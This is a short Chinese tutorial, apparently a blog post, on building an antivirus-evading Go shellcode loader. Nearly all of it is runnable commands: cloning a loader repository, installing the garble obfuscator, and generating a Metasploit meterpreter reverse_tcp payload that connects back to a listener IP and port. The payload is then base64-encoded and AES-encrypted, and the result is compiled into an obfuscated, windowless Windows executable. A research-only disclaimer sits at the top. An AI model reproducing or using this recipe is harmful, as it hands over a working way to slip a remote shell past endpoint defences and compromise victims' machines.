本文旨在探讨利用 GO 语言实现的免杀技术,仅供安全研究与学习之用。我们反对一切危害网络安全的行为,并强调使用者需自行承担法律责任。
安装: 首先,需要在 Kali Linux 环境中安装 GO 环境。执行以下命令进行安装:
sudo apt-get update && sudo apt-get install -y golang
项目克隆: 在本地环境中克隆项目:
git clone https://github.com/HZzz2/go-shellcode-loader.git cd go-shellcode-loader
接着,安装第三方混淆库:
go install mvdan.cc/garble@latest
生成并编码 Shellcode: 使用 Metasploit 生成 Shellcode 并进行 Base64 编码:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.123.43 LPORT=5555 -f raw > kali.raw base64 -w 0 -i kali.raw > kali.bs64 cat kali.bs64
替换 Payload: 将生成的 Shellcode 复制到 aes-sc.go 文件的第 44 行替换原有 Payload。
生成 AES 加密后的值: 运行 aes-sc.go 以生成 AES 加密后的值:
go run aes-sc.go
将输出的值复制到 go-sc.go 文件的第 52 行替换原有 Payload。
编译为可执行程序: 使用 Garble 编译 go-sc.go 成为可执行程序:
garble -tiny -literals -seed=random build -ldflags=”-w -s -H windowsgui” -race go-sc.go
这样,我们就完成了基于 GO 的免杀技术的探究和实践。
暂无评论内容